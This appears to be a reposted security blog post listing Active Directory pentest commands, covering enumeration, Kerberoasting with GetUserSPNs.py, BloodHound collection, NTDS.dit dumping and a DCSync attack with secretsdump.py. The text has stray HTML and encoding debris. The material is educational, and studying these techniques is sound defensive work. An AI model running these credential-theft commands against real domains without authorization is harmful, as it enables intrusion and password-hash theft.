Listen to this Post
π Readable version: https://lnkd.in/e-6SBNM5
π§ Now fully generated from markdown filesβway easier to update and maintain!
π‘ Got improvements? PRs welcome! π https://lnkd.in/eP-mb6nA
You Should Know:
Here are some practical commands and codes related to Active Directory (AD) that can help you in penetration testing and red teaming:
1. Enumerate Domain Users:
Get-ADUser -Filter * -Properties SamAccountName,DisplayName,MemberOf
2. Check Domain Trusts:
Get-ADTrust -Filter *
3. List All Domain Controllers:
Get-ADDomainController -Filter *
4. Extract Password Policies:
Get-ADDefaultDomainPasswordPolicy
5. Find Users with SPN (Service Principal Name):
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName
6. Kerberoasting Attack (Extract TGS Tickets):
GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER>
7. BloodHound Enumeration:
bloodhound-python -d <DOMAIN> -u <USER> -p <PASSWORD> -ns <DC_IP> -c All
8. Dump NTDS.dit for Password Hashes:
secretsdump.py -ntds ntds.dit -system SYSTEM <DOMAIN>/<USER>@<DC_IP>
9. Check for Unconstrained Delegation:
Get-ADComputer -Filter {TrustedForDelegation -eq $true} -Properties TrustedForDelegation
10. Enumerate GPOs (Group Policy Objects):
Get-GPO -All
What Undercode Say:
Active Directory is a critical component in most enterprise environments, and understanding its intricacies is essential for both offensive and defensive cybersecurity professionals. The mindmap provided in the article is an excellent resource for visualizing AD concepts, especially for penetration testers and red teamers.
Here are some additional Linux and Windows commands to enhance your AD knowledge:
- Linux (Impacket Tools):
</li> </ul> <h1>Enumerate SMB Shares</h1> smbclient -L //<TARGET_IP> -U <USER> <h1>Perform a DCSync Attack</h1> secretsdump.py <DOMAIN>/<USER>:<PASSWORD>@<DC_IP>
- Windows (PowerShell):
</li> </ul> <h1>Find Users with Admin Rights</h1> Get-ADGroupMember -Identity "Domain Admins" <h1>Check for Password Not Required Accounts</h1> Get-ADUser -Filter {PasswordNotRequired -eq $true} -Properties PasswordNotRequiredFor further reading, check out the official Microsoft documentation on Active Directory:
https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/get-started/virtual-dc/active-directory-domain-services-overviewMastering these commands and techniques will significantly improve your ability to assess and secure Active Directory environments. Keep practicing and stay updated with the latest tools and methodologies!
References:
Reported By: Cyril Servieres – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass βJoin Our Cyber World:
- Windows (PowerShell):
